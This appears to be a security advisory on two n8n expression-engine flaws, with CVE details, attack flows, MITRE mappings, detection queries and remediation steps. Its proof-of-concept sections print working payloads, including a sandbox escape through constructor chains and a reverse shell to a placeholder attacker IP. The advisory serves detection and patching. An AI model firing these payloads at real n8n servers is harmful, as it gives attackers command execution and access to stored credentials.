Product Name: n8n
Category: Workflow Automation / Integration Platform
Technology Stack: Node.js, TypeScript
Deployment Models: Self-hosted (Docker, npm, Kubernetes), Desktop App, Cloud
Default Port: 5678
Primary Functionality: Visual workflow automation connecting APIs, databases, internal services, SaaS platforms
n8n enables dynamic data processing through JavaScript-based expressions embedded in workflow nodes. These expressions are evaluated inside a sandboxed execution environment. The vulnerabilities below directly affect this expression engine and its sandbox isolation controls.
CVE-2026-27493 – Unauthenticated Expression Evaluation in Form Node
Basic CVE Information
| Field | Details |
|---|---|
| CVE ID | CVE-2026-27493 |
| Vulnerability Type | Remote Code Execution (RCE) |
| Component | Form Node |
| CVSS Score | 9.8 (Critical) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Exploitability | High |
| Exploit Availability | Proof of Concept available (educational use) |
| Impact | Full system compromise |
Vulnerability Summary
A critical flaw was identified in the Form Node component. Under certain configurations, user-supplied input submitted through publicly exposed forms was processed as expressions without adequate validation or isolation. The expression engine executed the payload on the server side.
Improper restriction of JavaScript evaluation allowed access to Node.js internals. Arbitrary commands could therefore be executed on the underlying operating system.
No authentication was required when the Form endpoint was exposed publicly, which significantly increased the risk.
Technical Details
The vulnerability stemmed from unsafe expression parsing combined with insufficient sandbox hardening. The evaluation mechanism failed to properly isolate:
requireprocesschild_process- Global constructors
- Node.js module resolution paths
Once access to these objects was achieved, system command execution became trivial.
If n8n was deployed inside a Docker container running as root (a common misconfiguration), full container escape or host compromise could follow.
Attack Scenario
- A publicly accessible n8n instance was identified.
- An active Form Node endpoint was discovered.
- Malicious JavaScript expression payload was submitted via form field.
- Payload was evaluated server-side.
- Remote command execution occurred.
- Reverse shell or persistence mechanism was deployed.
Because no authentication was required, automated scanning tools could identify and exploit vulnerable endpoints.
Proof of Concept (Educational)
Example payload to execute system command:
{{$evaluate("require('child_process').execSync('id').toString()")}}
Reverse shell example:
{{$evaluate("require('child_process').exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')")}}
These payloads demonstrated direct access to Node.js child_process module.
MITRE ATT&CK Mapping
- T1190 – Exploit Public-Facing Application
- T1059.007 – JavaScript Execution
- T1106 – Native API
- T1071 – Application Layer Protocol
- T1021 – Remote Services (if pivoting occurred)
Indicators of Compromise
- Unexpected child processes spawned by n8n
- Execution of
/bin/bash,sh,nc,curl,wget - Outbound connections to unknown IP addresses
- Suspicious expressions containing:
require(child_processprocess.mainModuleexecSynceval(
Detection Rules
Splunk Query
index=app_logs sourcetype=n8n
("require(" OR "child_process" OR "execSync" OR "process.mainModule")
Elastic (KQL)
process.name : "node" AND
process.command_line : ("child_process" OR "execSync" OR "bash -i")
Microsoft Sentinel (KQL)
DeviceProcessEvents
| where InitiatingProcessFileName == "node"
| where ProcessCommandLine contains "child_process"
or ProcessCommandLine contains "execSync"
or ProcessCommandLine contains "bash -i"
Linux Auditd Monitoring
-w /usr/bin/node -p x -k node_execution
Alert if node spawns shell processes.
Log Sources to Monitor
- n8n execution logs
- Docker container logs
- Reverse proxy logs (NGINX / Apache)
- EDR telemetry
- Linux auditd logs
- Sysmon (Windows deployments)
- Network firewall egress logs
Business Impact
- Complete server takeover
- Credential extraction from environment variables
- Access to stored OAuth tokens
- Workflow manipulation
- Internal network lateral movement
- Data exfiltration
If connected to CRM, ERP, payment processors, or internal APIs, the blast radius could be extensive.
Remediation
- Immediate upgrade to patched release
- Disable public Form Nodes if not required
- Enforce authentication on all endpoints
- Run container as non-root user
- Restrict outbound network access
- Implement Web Application Firewall rules
Official Patch
Upgrade to the latest stable release:
https://github.com/n8n-io/n8n/releases
CVE-2026-27577 – Expression Sandbox Escape
Basic CVE Information
| Field | Details |
|---|---|
| CVE ID | CVE-2026-27577 |
| Vulnerability Type | Sandbox Escape → Remote Code Execution |
| Component | Expression Engine |
| CVSS Score | 9.9 (Critical) |
| Attack Vector | Network |
| Privileges Required | Low / Depends on configuration |
| User Interaction | None |
| Exploitability | Very High |
| Exploit Availability | Proof of Concept available (educational use) |
| Impact | Full Remote Code Execution |
Vulnerability Summary
The expression sandbox mechanism was designed to restrict JavaScript execution within workflows. However, insufficient isolation controls allowed attackers to escape the sandbox using crafted constructor chains.
Global object constructors were not fully restricted. By chaining constructors, access to the process object was achieved. From there, Node.js module loading mechanisms could be abused to execute arbitrary commands.
Technical Details
The flaw involved exposure of:
Functionconstructor- Prototype chain traversal
- Incomplete freezing of global context
- Access to
this.constructor.constructor
By abusing JavaScript internals, the sandbox boundary was bypassed.
Exploitation Flow
- Expression editing access was obtained.
- Malicious constructor chain was injected.
- Access to
processobject was retrieved. mainModule.require('child_process')was invoked.- Arbitrary command execution occurred.
Even low-privilege users with expression editing rights could escalate privileges.
Proof of Concept (Educational)
{{$evaluate("this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()")}}
MITRE ATT&CK Mapping
- T1068 – Exploitation for Privilege Escalation
- T1059 – Command and Scripting Interpreter
- T1203 – Exploitation for Execution
- T1027 – Obfuscated/Compressed Files
Indicators of Compromise
- Presence of
constructor.constructor Function('return process')mainModule.require- Node process spawning shell
- Unexpected workflow modifications
- Unauthorized admin-level API calls
Detection Rules
Splunk Query
index=app_logs sourcetype=n8n
("constructor.constructor" OR "mainModule.require" OR "Function('return process')")
Elastic (KQL)
process.name : "node" AND
process.command_line : ("constructor.constructor" OR "mainModule.require")
Microsoft Sentinel (KQL)
DeviceProcessEvents
| where InitiatingProcessFileName == "node"
| where ProcessCommandLine contains "constructor.constructor"
or ProcessCommandLine contains "mainModule.require"
Network Monitoring
Alert on outbound connections from n8n container to unknown external IP addresses over uncommon ports.
Log Sources to Monitor
- n8n workflow execution history
- User activity logs
- Authentication logs
- Reverse proxy access logs
- OS-level process creation logs
- Container runtime monitoring
- Firewall egress logs
Business Impact
- Complete automation platform compromise
- Exposure of API credentials and secrets
- SaaS account takeover via stored tokens
- Data theft and manipulation
- Ransomware staging opportunity
- Supply chain compromise risk
Given that n8n often integrates with financial systems, cloud platforms, and internal services, the operational impact could extend beyond the automation platform itself.
Remediation
- Immediate upgrade to patched release
- Restrict expression editing permissions
- Enforce strict RBAC
- Deploy behind reverse proxy with authentication
- Implement network segmentation
- Monitor for anomalous workflow behavior
- Enforce container runtime security policies
Official Patch
Upgrade to the latest stable release:
https://github.com/n8n-io/n8n/releases
